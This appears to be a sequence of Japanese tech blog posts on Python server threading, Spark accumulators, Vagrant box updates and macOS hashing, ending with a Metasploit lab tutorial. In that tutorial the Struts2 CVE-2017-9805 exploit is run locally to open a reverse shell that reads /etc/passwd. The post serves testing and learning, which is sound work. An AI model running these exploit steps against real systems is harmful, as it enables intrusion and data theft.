    print('duration: {sec} sec'.format(sec=(t1 - t0)))


if __name__ == '__main__':
    main()

先ほどのサーバを起動したまま、別の端末で実行する。 すると、処理が終わるのに 10 秒かかっており各リクエストが直列で処理されていることが分かる。

$ python benchmark.py
duration: 10.021423101425171 sec

ちなみに Jupyter Notebook を使っていれば %%time マジックコマンドが使えるので、時間を測るのにもっと楽ができる。

%%time
"""time マジックコマンドを使って実行時間を測る"""

# マルチスレッドで処理を実行するエグゼキュータを用意する
from concurrent.futures import ThreadPoolExecutor
executor = ThreadPoolExecutor(max_workers=2)

# HTTP リクエスト 2 件を並行実行する
import requests
parameters = ['http://localhost:8000' for _ in range(2)]
list(executor.map(requests.get, parameters))

実行すると、こんな感じ。

CPU times: user 7.46 ms, sys: 2.65 ms, total: 10.1 ms
Wall time: 10 s

測り終わったらサーバを動かしている端末は Ctrl-C で止めよう。

マルチスレッド化する

次にシングルスレッドの実装だった WSGIServer をマルチスレッド化してみる。 これには ThreadingMixIn を用いる。 詳しい原理については後ほど紹介する。

次のサンプルコードでは ThreadingMixIn を使って WSGIServer をマルチスレッド化している。 具体的には ThreadingMixInWSGIServer を多重継承したクラス ThreadedWSGIServer を作っている。 動かす WSGI アプリケーションについては先ほどと変わらない。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time

from wsgiref.simple_server import make_server
from wsgiref.simple_server import WSGIServer

try:
    # Python 3
    from socketserver import ThreadingMixIn
except ImportError:
    # Python 2
    from SocketServer import ThreadingMixIn


class ThreadedWSGIServer(ThreadingMixIn, WSGIServer):
    """マルチスレッド化した WSGIServer"""
    pass


def application(_environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])

    # レスポンスが返るまで 5 秒かかる
    time.sleep(5)

    yield b'Hello, World!\n'


def main():
    server = make_server('localhost', 8000, application,
                         # マルチスレッド化した WSGIServer を使って起動する
                         server_class=ThreadedWSGIServer)
    server.serve_forever()


if __name__ == '__main__':
    main()

先ほどと同じように、起動したら処理時間を測ってみよう。

$ python wsgimultithread.py

結果は次の通り。 先ほどとは異なって処理が 5 秒で終わっている。 これはリクエストが直列ではなく並行で処理されたことを示している。

CPU times: user 6.81 ms, sys: 2.63 ms, total: 9.43 ms
Wall time: 5.01 s

このように ThreadingMixIn を多重継承することで WSGIServer はマルチスレッド化できる。

測定が終わったら、先ほどと同じように Ctrl-C でサーバを止める。

http.server.HTTPServer

同じように HTTPServer についても考えてみよう。 次のサンプルコードでは、先ほどと同じようにレスポンスまで 5 秒かかるハンドラをシングルスレッドの HTTPServer で動かしている。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time

try:
    # Python 3
    from http.server import BaseHTTPRequestHandler
    from http.server import HTTPServer
except ImportError:
    # Python 2
    from BaseHTTPServer import BaseHTTPRequestHandler
    from BaseHTTPServer import HTTPServer


class GreetingHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.end_headers()

        # Content-Body の送信まで 5 秒のディレイが入る
        time.sleep(5)

        self.wfile.write(b'Hello, World!\r\n')


def main():
    server_address = ('localhost', 8000)
    # シングルスレッドな HTTPServer を使って起動する
    httpd = HTTPServer(server_address, GreetingHandler)
    httpd.serve_forever()


if __name__ == '__main__':
    main()

これまでと同じように、起動したら実行時間を測ってみよう。

$ python httpsinglethread.py

次のように 10 秒かかることが分かった。 やはり、リクエストが直列に処理されてしまっている。

CPU times: user 7.93 ms, sys: 3.16 ms, total: 11.1 ms
Wall time: 10 s

マルチスレッド化する

次に HTTPServer クラスをマルチスレッド化する。 やり方は、先ほどの WSGIServer と変わらない。 ThreadingMixIn と一緒に多重継承するだけ。

次のサンプルコードではマルチスレッド化した ThreadedHTTPServer で時間のかかるハンドラを動かしている。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time

try:
    # Python 3
    from http.server import BaseHTTPRequestHandler
    from http.server import HTTPServer
    from socketserver import ThreadingMixIn
except ImportError:
    # Python 2
    from BaseHTTPServer import BaseHTTPRequestHandler
    from BaseHTTPServer import HTTPServer
    from SocketServer import ThreadingMixIn


class GreetingHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.end_headers()

        # Content-Body の送信まで 5 秒のディレイが入る
        time.sleep(5)

        self.wfile.write(b'Hello, World!\r\n')


class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """マルチスレッド化した HTTPServer"""
    pass


def main():
    server_address = ('localhost', 8000)
    # マルチスレッド化した HTTP サーバを使う
    httpd = ThreadedHTTPServer(server_address, GreetingHandler)
    httpd.serve_forever()


if __name__ == '__main__':
    main()

起動して、処理にかかる時間を測ってみよう。

$ python httpmultithread.py

次のように 5 秒で終わったことから、リクエストが並行処理されたことが分かる。

CPU times: user 7.1 ms, sys: 2.92 ms, total: 10 ms
Wall time: 5.01 s

ThreadingMixIn を使ったマルチスレッド化の原理について

それでは、次にどうして ThreadingMixIn を多重継承することで、前述した WSGIServerHTTPServer がマルチスレッド化できたのかについて見ていく。

まずは ThreadingMixIn のソースコードを確認すると process_request() というメソッドを実装していることが分かる。

https://github.com/python/cpython/blob/v3.6.2/Lib/socketserver.py#L645

上記のメソッドでは受け取った request を、新たに生成した threading.Thread で処理していることが読み取れる。 これが WSGIServerHTTPServerprocess_request() メソッドをオーバーライドしていたわけだ。

では process_request() は、どこで定義されているかというと、以下の BaseServer クラス内に見つかる。

https://github.com/python/cpython/blob/v3.6.2/Lib/socketserver.py#L157

次の場所に process_request() があって docstring にも、これは ForkingMixInThreadingMixIn で上書きされる、とある。

https://github.com/python/cpython/blob/v3.6.2/Lib/socketserver.py#L342

ForkingMixIn というのは初めて登場したけど、マルチプロセスを使った並列化をするのに使われるクラスのこと。

そして WSGIServerHTTPServerBaseServer を継承して作られている。 それぞれの process_request() メソッドを ThreadingMixIn がオーバーライドすることでマルチスレッド化されたわけだ。

>>> from socketserver import BaseServer
>>> from wsgiref.simple_server import WSGIServer
>>> issubclass(WSGIServer, BaseServer)
True
>>> from http.server import HTTPServer
>>> issubclass(HTTPServer, BaseServer)
True

これで ThreadingMixIn を使ってマルチスレッド化ができる理由がわかった。

まとめ

BaseServer を継承して作られた Python 組み込みのソケットサーバは ThreadingMixIn を多重継承することでマルチスレッド化できる。

Apache Spark でクラスタリングすると動かなくなるプログラムについて

今回は Apache Spark をスタンドアロンで使っていると上手くいくのに、クラスタリングした途端に上手くいかなくなる状況がある、ということについて。

スタンドアロンなら上手くいく場合

まずは Apache Spark のコマンドラインシェルを起動する。 この場合はシングルノードのスタンドアロンで動かしている。

$ $SPARK_HOME/bin/spark-shell

複数の値が格納された RDD を作る。

scala> val rdd = sc.parallelize(Array(1, 2, 3))
rdd: org.apache.spark.rdd.RDD[Int] = ParallelCollectionRDD[0] at parallelize at <console>:24

そして、それらに対して foreach() メソッドで println() 関数を適用してみる。

scala> rdd.foreach(println)
1
2
3

この場合、直感的にも正しく動作する。

クラスタリングすると動かなくなる

続いて YARN を使ってクラスタリングした状況でコマンドラインシェルを起動する。

$ $SPARK_HOME/bin/spark-shell --master yarn

先程と同じように複数の値が入った RDD を作る。

scala> val rdd = sc.parallelize(Array(1, 2, 3))
rdd: org.apache.spark.rdd.RDD[Int] = ParallelCollectionRDD[0] at parallelize at <console>:24

そして、同じように println() 関数を適用してみよう。 しかし、今度は何ら出力されない。

scala> rdd.foreach(println)

シングルノードとクラスタリングしたという違いだけで動作が変わっている。

上記は rdd.foreach(println) という処理がワーカーノードで実行されてしまっているために起きている。 もし、ドライバ上で実行したいときは、次のように一旦 collect() メソッドでドライバに値を集約して実行しなきゃいけない。

scala> rdd.collect().foreach(println)
1
2
3

ワーカーノードに渡されるのは変数のコピー

同じような例をもう一つ紹介する。 今度は RDD に含まれる値の数を数えてみよう。

scala> val rdd = sc.parallelize(Array(1, 2, 3))
rdd: org.apache.spark.rdd.RDD[Int] = ParallelCollectionRDD[1] at parallelize at <console>:24

値の数を数え上げるためのカウンタとなる変数を用意する。

scala> var counter = 0
counter: Int = 0

そして、foreach() メソッドで RDD の値を数え上げる。 直感的には counter 関数の値は RDD に含まれる数だけカウントアップされるように感じるはずだ。

scala> rdd.foreach(x => counter += x)

しかし、実際には変数は 0 のままでカウントアップされていない。

scala> println(counter)
0

こんなことが、どうして起こるのだろうか?

これは Apache Spark でクラスタリングしたとき、ワーカーノードに渡される変数が単なるコピーであることに由来している。 カウントアップの処理は、各ワーカーノード上でコピーの変数に対して実行されるためドライバ上のオリジナルには反映されない。

ワーカーと値を共有するにはアキュムレータを用いる

上記を意図通りに動かすにはカウンタとなる変数としてアキュムレータを使う必要があるようだ。

scala> val rdd = sc.parallelize(Array(1, 2, 3))
rdd: org.apache.spark.rdd.RDD[Int] = ParallelCollectionRDD[0] at parallelize at <console>:24
scala> val counter = sc.longAccumulator
counter: org.apache.spark.util.LongAccumulator = LongAccumulator(id: 1, name: None, value: 0)
scala> rdd.foreach(x => counter.add(x))
scala> counter.value
res4: Long = 6

参考

spark.apache.org

Sparkによる実践データ解析 ―大規模データのための機械学習事例集

Sparkによる実践データ解析 ―大規模データのための機械学習事例集

Vagrant Cloud から取得した Box のバージョンを更新する

今回は Vagrant Cloud からダウンロードしてきた Vagrant Box を更新する方法について。 それにしても、最近は自分で Vagrant Box を作っていた頃なんてすっかり今は昔という感じだ。

使った環境は次の通り。

$ sw_vers
ProductName:    Mac OS X
ProductVersion: 10.12.6
BuildVersion:   16G29
$ vagrant --version
Vagrant 1.9.7

まず、次のように Vagrant Cloud からダウンロードしてきた Box が登録されている状況を考える。 使っている Box は Ubuntu 公式の ubuntu/xenial64 だ。

$ vagrant box list
ubuntu/xenial64 (virtualbox, 20170803.0.0)

そして、Vagrant Cloud に登録されている Box は、定期的にバージョンアップすることがある。 そんなときは vagrant box update コマンドを使って更新しよう。 更新する Box は --box オプションで指定する。

$ vagrant box update --box ubuntu/xenial64
Checking for updates to 'ubuntu/xenial64'
Latest installed version: 20170803.0.0
Version constraints: > 20170803.0.0
Provider: virtualbox
Updating 'ubuntu/xenial64' with provider 'virtualbox' from version
'20170803.0.0' to '20170830.1.1'...
Loading metadata for box 'https://vagrantcloud.com/ubuntu/xenial64'
Adding box 'ubuntu/xenial64' (v20170830.1.1) for provider: virtualbox
Downloading: https://vagrantcloud.com/ubuntu/boxes/xenial64/versions/20170830.1.1/providers/virtualbox.box
Successfully added box 'ubuntu/xenial64' (v20170830.1.1) for 'virtualbox'!

これで、次のように更新された Box が得られる。

$ vagrant box list
ubuntu/xenial64 (virtualbox, 20170803.0.0)
ubuntu/xenial64 (virtualbox, 20170830.1.1)

ちなみに、更新したい Box を使っている Vagrantfile がカレントディレクトリにあるときはオプションを指定しなくても良い。

$ ls
Vagrantfile
$ vagrant box update
==> default: Checking for updates to 'ubuntu/xenial64'
    default: Latest installed version: 20170830.1.1
    default: Version constraints: 
    default: Provider: virtualbox
==> default: Updating 'ubuntu/xenial64' with provider 'virtualbox' from version
==> default: '20170830.1.1' to '20170914.2.0'...
==> default: Loading metadata for box 'https://vagrantcloud.com/ubuntu/xenial64'
==> default: Adding box 'ubuntu/xenial64' (v20170914.2.0) for provider: virtualbox
    default: Downloading: https://vagrantcloud.com/ubuntu/boxes/xenial64/versions/20170914.2.0/providers/virtualbox.box
==> default: Box download is resuming from prior download progress
==> default: Successfully added box 'ubuntu/xenial64' (v20170914.2.0) for 'virtualbox'!
$ vagrant box list
ubuntu/xenial64 (virtualbox, 20170803.0.0)
ubuntu/xenial64 (virtualbox, 20170830.1.1)
ubuntu/xenial64 (virtualbox, 20170914.2.0)

めでたしめでたし。

macOS: ファイルのハッシュ値を計算する

ファイルのハッシュ値を計算するのに macOS だと何を使うんだっけ?と毎回なるのでメモしておく。 GNU Linux で使い慣れた *sum コマンドを使おうとすると、そんなものないよ!と怒られてしまうので。

$ md5sum
zsh: command not found: md5sum
$ sha1sum
zsh: command not found: sha1sum

使った環境は次の通り。

$ sw_vers
ProductName:    Mac OS X
ProductVersion: 10.12.6
BuildVersion:   16G29

MD5

ファイルの MD5 のハッシュ値を計算したいときは md5 コマンドがデフォルトで入っているので、それを使う。

$ md5 ubuntu-16.04-server-amd64.iso
MD5 (ubuntu-16.04-server-amd64.iso) = 23e97cd5d4145d4105fbf29878534049

SHA1

同様に SHA1 のハッシュ値を計算したいときは shasum コマンドを使う。 SHA 系のアルゴリズムは全てこのコマンドで計算できるため -a オプションでアルゴリズムを指定する。

$ shasum -a 1 ubuntu-16.04-server-amd64.iso
70db69379816b91eb01559212ae474a36ecec9ef  ubuntu-16.04-server-amd64.iso

SHA2

前述した通り shasum コマンドは SHA2 のハッシュ値も計算できる。 SHA256 であれば -a オプションに 256 を、SHA512 なら 512 を指定すれば良い。

$ shasum -a 256 ubuntu-16.04-server-amd64.iso
b8b172cbdf04f5ff8adc8c2c1b4007ccf66f00fc6a324a6da6eba67de71746f6  ubuntu-16.04-server-amd64.iso
$ shasum -a 512 ubuntu-16.04-server-amd64.iso
64cc359f1fb23181ba402d69a9fe787b5063156531cf44090a74fa8b4892294ee0c7a55d50b2f1875149326371796c7943ce07f171a54c9b8d617391af688eaa  ubuntu-16.04-server-amd64.iso

コンピュータネットワークセキュリティ

コンピュータネットワークセキュリティ

Metasploit Framework でペネトレーションテストを実施する

Metasploit Framework というのはオープンソースのペネトレーションテストツール。 ペネトレーションテストというのは、実際にシステムに対して侵入を試みるなど Exploit を実行するテストを指している。 その成功可否によって、システムが脆弱性の影響を受けるのかが確認できる。 そのため Metasploit Framework には既知の様々な脆弱性に対する Exploit が収録されている。 今回は、このツールを Ubuntu 16.04 LTS にインストールして試してみる。

注意: 不正アクセスとなるため間違っても外部のサーバに対して実行しないこと

環境は次の通り。

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.3 LTS
Release:    16.04
Codename:   xenial
$ uname -r
4.4.0-93-generic

インストール

Metasploit Framework のインストールは、次のようにインストールスクリプトを取得してきて実行するだけで良い。

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
$ chmod 755 msfinstall
$ ./msfinstall
...(snip)...
W: --force-yes is deprecated, use one of the options starting with --allow instead.

どうやら最後に表示される Warning は、とりあえず無視しても大丈夫っぽい。

上記を実行すると Metasploit Framework のパッケージが入る。

$ sudo dpkg -l | grep -i metasploit-framework
ii  metasploit-framework                       4.16.5+20170906092721~1rapid7-1              amd64        The full stack of metasploit-framework

基本的な使い方

Metasploit Framework をインストールすると msfconsole コマンドが使えるようになる。 操作は、このコマンドで起動するシェル上で行う。

$ msfconsole

初回起動時には、次のようにデータベースのセットアップをするか聞かれるので y を入力しておく。

$ msfconsole

 ** Welcome to Metasploit Framework Initial Setup **
    Please answer a few questions to get started.


Would you like to use and setup a new database (recommended)? y

次のようにシェルが表示されれば正常に起動できている。

=[ metasploit v4.16.7-dev-                         ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

操作方法としては、例えばまず search コマンドで使って収録されている Exploit を検索できる。

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

目当てのものが見つかったら use コマンドで選択する。

msf > use exploit/unix/ftp/vsftpd_234_backdoor

それぞれの Exploit には入力すべきオプションがある。 これは show options コマンドで確認できる。

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

上記の例ではオプションの RHOST が必須にもかかわらずデフォルト値のない空欄になっている。

そこで RHOST の値を埋める。

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.33.11
RHOST => 192.168.56.11

あとは Exploit を実行するだけ。

msf exploit(vsftpd_234_backdoor) > exploit

以上が基本的な使い方の流れとなっている。

使い終わったら exit コマンドでシェルから抜ける。

msf > exit

実際に試してみる

今回は、先日巷をさわがせた Struts2 の脆弱性 S2-052 (CVE-2017-9805) を例に挙げてみる。

まずは Struts2 を動かすサーブレットコンテナとして Tomcat をインストールする。

$ sudo apt-get -y install tomcat

インストールすると、それだけでサービスが起動してくる。

$ sudo systemctl status tomcat7
● tomcat7.service - LSB: Start Tomcat.
   Loaded: loaded (/etc/init.d/tomcat7; bad; vendor preset: enabled)
   Active: active (running) since Tue 2017-09-12 10:45:40 UTC; 20s ago
     Docs: man:systemd-sysv-generator(8)
   CGroup: /system.slice/tomcat7.service
           └─5185 /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.

続いては、上記のサーブレットコンテナ上で脆弱性のある Struts2 の Web アプリケーションを動かす。 検証環境は、インターネットからアクセスできる範囲に作らないように注意しよう。

脆弱性を含んだ Struts2 のサンプルアプリケーションをダウンロードしてきてデプロイする。 今回の脆弱性は REST Plugin を使っているアプリケーションが影響を受けるので struts2-rest-showcase.war を使えば良い。

$ wget http://ftp.yz.yamagata-u.ac.jp/pub/network/apache/struts/2.5.12/struts-2.5.12-apps.zip
$ sudo apt-get -y install unzip
$ unzip struts-2.5.12-apps.zip
$ sudo cp struts-2.5.12/apps/struts2-rest-showcase.war /var/lib/tomcat7/webapps/

WAR ファイルが展開されていることを確認する。

$ ls /var/lib/tomcat7/webapps/
ROOT  struts2-rest-showcase  struts2-rest-showcase.war

これで準備が整った。 それでは msfconsole コマンドで Metasploit Framework のシェルを立ち上げよう。

$ msfconsole

今回の脆弱性に対応した Exploit の exploit/multi/http/struts2_rest_xstream を選択する。

msf > use exploit/multi/http/struts2_rest_xstream

オプションを確認すると Exploit の実行先として RHOST を設定する必要がありそうだ。

msf exploit(struts2_rest_xstream) > show options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                       yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts action
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

今回は Exploit を受ける Struts2 のアプリケーションがローカルホストで動作しているのでループバックアドレスを指定する。

msf exploit(struts2_rest_xstream) > set RHOST 127.0.0.1
RHOST => 127.0.0.1

これで必要な設定が済んだ。 exploit コマンドで Exploit を実行しよう。

msf exploit(struts2_rest_xstream) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP double handler on 127.0.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 1IeHfWRzrnKssQOS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "1IeHfWRzrnKssQOS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46452) at 2017-09-12 10:54:09 +0000

上記で具体的に何をしているかというと、今回使った Exploit に関しては脆弱性を利用してバックドアを開いている。 そして、それに接続したコマンドラインシェルが立ち上がる、という動作になっている。

バックドアのシェル上で Linux のコマンドを打ち込むと、それに対する応答が返ってくる。

uname -a
Linux ubuntu-xenial 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

バックドアのプロセスは Tomcat が動作しているプロセスの権限で動作する。 そのため、破壊的な変更を加えるには何らか別の特権昇格が必要かもしれない。 例えばホストをシャットダウンさせようとしても権限がないと言われる。

shutdown -h now
Failed to set wall message, ignoring: Interactive authentication required.
Failed to power off system via logind: Interactive authentication required.
Failed to start poweroff.target: Interactive authentication required.
See system logs and 'systemctl status poweroff.target' for details.
Failed to open /dev/initctl: Permission denied
Failed to talk to init daemon.

とはいえ、情報漏えいについては十分に有効なので致命的な脆弱性だ。

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...(省略)

まとめ

今回はオープンソースのペネトレーションテストツールである Metasploit Framework を使ってみた。 一つ注意すべき点としては Metasploit Framework で攻撃が成立しなかったから、という理由だけで安心しないこと。 本来は影響を受けるのに、何らかの設定の不備で成立しなかっただけに過ぎないという恐れは多いにある。 なので、脆弱性のバックグラウンドや具体的な原理、そして Exploit の内部的な動作までちゃんと理解した上で使う必要がある。 つまり、脆弱性について一通り調べ上げた上で、最終確認に使うための手段といった位置づけで捉えておくと良いんじゃないだろうか。

コンピュータネットワークセキュリティ

コンピュータネットワークセキュリティ